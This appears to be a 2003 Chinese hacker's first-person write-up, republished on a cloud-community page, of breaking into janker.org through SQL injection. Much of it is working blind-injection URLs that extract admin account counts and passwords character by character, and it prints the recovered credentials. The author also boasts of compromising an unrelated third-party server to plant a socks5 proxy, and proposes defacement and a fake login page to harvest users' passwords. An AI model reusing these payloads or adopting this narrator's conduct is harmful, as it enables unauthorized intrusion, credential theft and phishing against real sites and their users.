我是這樣滲透入侵孤獨劍客網站(janker.org)的

來源:互聯網
上載者:User
我是這樣滲透入侵孤獨劍客網站(janker.org)的
作者:N.E.V.E.R
日期:2003年5月22日
出自http://www.janker.org

不成功的入侵還是有點借鑒價值的,我想同樣的方法換一個地方的話,說不定就成功了。
目的地www.janker.org,呵呵,應該算是授權了的吧。傳說中的駭客叔叔們都是先踩點的,
如果我有條件的話,一定先到機房附近去看看,興許還能撿到點密碼什麼的。不過實在太遠,買車


票過去的時間說不定我都可以打一把Windforce了,還是來點遠端吧。
拿出掃描器甲乙丙丁一陣亂掃,呵呵,結果大家都能猜到,就不廢話了。反正80和23是開著的


,這個結果要記住。
系統漏洞沒有的話,有幾種方法可以供選擇:1、滲透;2、指令碼漏洞。當然,還可以玩


D.D.o.S,還可以背上炸藥包炸主機,還可以用拖網把電纜弄斷,還可以開飛機把那棟樓撞了,等


等。當然這些要看攻擊者的想象力,我還是老老實實的看指令碼。
找啊找啊,找了幾秒鐘,找到一個地方沒有很好的處理參數id。
http://www.janker.org/show.asp?id=2;--
出錯了。“Microsoft JET Database Engine 錯誤 "80040e14" 在 SQL 陳述式結尾之後找到字


符。”嗯,大蝦們肯定已經看出來了吧?我想來想去覺得這句話告訴了兩件事情:一、用的是


ACCESS資料庫;二、指令碼裡面興許有什麼" where id=" & request("id")之類的沒有過濾的洞洞。


關鍵是怎麼用呢?
我還是決定像瞎子摸象一樣再看看,猜了一會兒後,覺得一個發布系統遠程總會有一個管理系


統吧,猜猜表名看看。
http://www.janker.org/show.asp?id=2 or id in (select id from admin)
OK,沒有報錯,那麼說起來存在一個admin的表,而且這張表裡面有id項,其實後來想想這樣


不好,子查詢只是要確定一下有沒有admin這張表,用..... id <> (select count(*) from


admin)比較好。
繼續猜,猜了幾個常見的列名,嗯,得到的結果是有user,password。到這裡的時候,我覺得


我走了很多彎路,雖然第一直覺是這是一個免費的公開原始碼的東東,但是因為一下子我沒有認出


來是什麼(我看過的東西很少啊,呵呵……),就沒有去找下載,現在猜得頭暈,覺得還是應該去


找代碼來看比較好。
於是我的方向又轉到如何去找相同的東東。呵呵,很笨的,我想到了在google.coms搜尋


fir.asp,因為fir.asp是很奇怪的一個名字,結果我找到了很多很多相同的網站。我覺得幾千個結


果裡面總有非常容易入侵的機器吧,嗯,我用的是webdavx3,大約失敗60次以後,終於找了一個進


去。當然啦,我只是要看看代碼,沒有別的意思,只是在這台機器上裝了socks5代理(呵呵),補


上漏洞就出來了。
這個時候已經臨近熄燈時間,我就乾脆斷了網看代碼,嗯,應該說是看那個Access資料庫。早


這樣的話,我就會少走好多彎路啊,不過猜猜也很有意思,大腦長期不用會生鏽的。
有人想到直接下資料庫吧?呵呵,哪有這麼容易的事情啊,資料庫的名字百分之一百二被改掉


了。
嗯,反正我已經知道admin表是怎樣的了,猜猜密碼也還不算是太累的工作。先看看admin裡面


有幾個管理員。
http://www.janker.org/show.asp?id=3 AND 1<(select count(*) from admin)
嗯,比一個多……
http://www.janker.org/show.asp?id=3 AND 10<(select count(*) from admin)
沒有十個……
(省略無聊過程若干)
http://www.janker.org/show.asp?id=3 AND 5=(select count(*) from admin)
有五個管理員呢,隨便找一個破一下啊……
我選的是id=1的,我先猜的是它的密碼第一位,呵呵,密碼總要一位一位的猜嘛……
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left


(password,1)="q")
嗯,顯示是“未指定所需參數!”那麼第一位不是q了,如果我們提交的SQL查詢正確執行——也就


是我們猜對了的話,是會出來id=3的那篇文章的(前面的那些也一樣)。繼續來吧……
w、e、r、t、y……猜了一會兒,結果出來了。
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left


(password,1)="j")
顯示了id為3的那篇文章,密碼第一位為j。
暫停一下,如果密碼有個2、30位的話,豈不是要猜死了,先看看密碼有幾位再說吧。方法和


猜管理員的個數是一樣的,直接給出結果
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where len(password)=7


and id=1)
7位,剛好在我的心理承受範圍之內,8位以上的話就要考慮寫程式猜了。猜測的過程是美好的


,你看到第一位是j後會怎樣想呢,優先猜的肯定是a、A、4、@、k之類的吧?如果你猜到了前面三


位是jk2,後面的00也會很自信的寫上去吧?最後的密碼是jk2008!,呵呵,如果你在30分鐘內沒有


一位一位的猜出來的話,就不要做hacker/cracker了。還是給出過程:
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left


(password,2)="jk")


http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left


(password,3)="jk2")


http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left


(password,4)="jk20")


http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left


(password,5)="jk200")


http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left


(password,6)="jk2008")


http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left


(password,7)="jk2008!")
嗯,大家在考場上有沒有擲色子做選擇題的經曆啊?一般都是扔兩次吧,呵呵,驗算一下也是


很必要的哦。順便把使用者名稱也猜出來了……
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where


password="jk2008!" and name="janker")
經過一番搗鼓,我終於得到了一個使用者名稱/密碼,嗯,很費工夫吧?費工夫的還在後面呢,還


有四個使用者可是等著我們猜的。當然,全部得到我想要的東西時,已經是第二天的事情了,至於用


戶名密碼,我就不說了,我只是說過程嘛……
然後幹什麼就是定式了吧?我選擇的道路是先進入管理介面發布兩條搞笑的訊息,然後說不定


有什麼跨站指令碼漏洞,新聞是顯示在首頁上的,沒有過濾html字元的情況下,你可以想辦法建一個


1600x1200的div,背景色設定為黑,真正把它“黑”掉。或者重新整理到你自己偽造的頁面上,等待那


些習慣從首頁登陸的同志們的密碼



相關文章

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。